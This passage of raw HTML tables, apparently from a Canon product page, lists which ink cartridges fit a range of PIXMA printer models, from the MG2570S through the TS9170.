Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MG2570S</td><td>CL-746 (Colour)</td></tr><tr><td>CL-746S (Colour)</td></tr><tr><td>CL-746XL (Colour)</td></tr><tr><td>PG-745 (Pigment Black)</td></tr><tr><td>PG-745S (Pigment Black)</td></tr><tr><td>PG-745XL (Pigment Black)</td></tr><tr><td rowspan=\"6\" align=\"center\">PIXMA MG2577S</td><td>CL-746 (Colour)</td></tr><tr><td>CL-746S (Colour)</td></tr><tr><td>CL-746XL (Colour)</td></tr><tr><td>PG-745 (Pigment Black)</td></tr><tr><td>PG-745S (Pigment Black)</td></tr><tr><td>PG-745XL (Pigment Black)</td></tr></tbody></table>  <table width=\"378\" border=\"1\" cellpadding=\"10\">\n    <tbody>\n    <tr>\n      <td width=\"170\"><strong>Model</strong></td>\n      <td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MG3570</td>\n      <td>CL-741 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-741XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-740 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-740/CL-741 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-740XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MG3670</td>\n      <td>CL-741 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-741XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-740 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-740/CL-741 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-740XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"10\" align=\"center\">PIXMA MG7570</td>\n      <td>CLI-751 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Gray)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-751 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Gray)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-751XL (Yellow)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"3\" align=\"center\">PIXMA MP160</td>\n      <td>CL-41 (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-40 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-40/CL-41 Value Pack</td>\n    </tr>\n    <tr>\n      <td rowspan=\"3\" align=\"center\">PIXMA MP170</td>\n      <td>CL-41 (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-40 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-40/CL-41 Value Pack</td>\n    </tr>\n    <tr>\n      <td rowspan=\"3\" align=\"center\">PIXMA MP180</td>\n      <td>CL-41 (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-40 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-40/CL-41 Value Pack</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP228</td>\n      <td>CL-41 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-831 (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-40 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-40/CL-41 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-830 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP237</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP245</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP258</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP276</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    </tbody>\n  </table><table width=\"378\" border=\"1\" cellpadding=\"10\">\n  <tbody>\n    <tr>\n      <td width=\"170\"><strong>Model</strong></td>\n      <td width=\"170\"><strong>Cartridge / Bottle</strong></td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP287</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"3\" align=\"center\">PIXMA MP460</td>\n      <td>CL-41 (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-40 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-40/CL-41 Value Pack</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP476</td>\n      <td>CL-41 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-831 (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-40 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-40/CL-41 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-830 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP486</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP496</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP497</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP500</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"4\" align=\"center\">PIXMA MP520</td>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP530</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP568</td>\n      <td>CLI-821 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-820 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP600</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n  </tbody>\n</table>\n<table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP610</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP628</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP638</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP648</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800R</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP810</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP830</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP970</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP988</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP996</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â 